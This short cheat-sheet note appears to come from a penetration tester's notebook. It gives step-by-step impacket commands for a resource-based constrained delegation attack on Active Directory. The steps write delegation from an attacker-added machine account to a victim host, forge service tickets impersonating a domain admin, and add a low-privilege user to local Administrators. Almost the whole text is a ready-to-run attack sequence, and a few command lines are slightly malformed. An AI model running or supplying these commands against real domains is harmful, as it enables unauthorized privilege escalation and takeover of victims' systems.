rbcd.py
rbcd.py is part of impacket.
Example of doing the RBCD attack when you have the TGT of a user with write access to a victim machine
Delegate TO a victim box FROM the machine you added to AD
rbcd.py -delegate-from 'GHOSTY$' -delegate-to 'VICTIMSYSTEM$' -action 'write' 'domain.com/user-you-have-a-TGT-for -k -no-pass
Then use getst to request a TGS on behalf of a high privilege user.
getST.py -impersonate 'domainadmin' -spn 'cifs/victim.domain.com' 'domain.com/GHOSTY$' -k -no-pass
export KRB5CCNAME=domainadmin.ccache
Then use gettgt to request a TGT for the GHOSTY machine.
gettgt.py domain.com/GHOSTY$`
export KRB5CCNAME=GHOSTY.ccache
Then use getst one more time to request TGS on behalf of a high privilege user.
getST.py -impersonate 'domainadmin' -spn 'cifs/VICTIM.domain.com' 'domain.com/GHOSTY$'
Finally, use something like net.py to grant yourself local admin rights
net.py -k -no-pass VICTIM localgroup -name Administrators -join lowpriv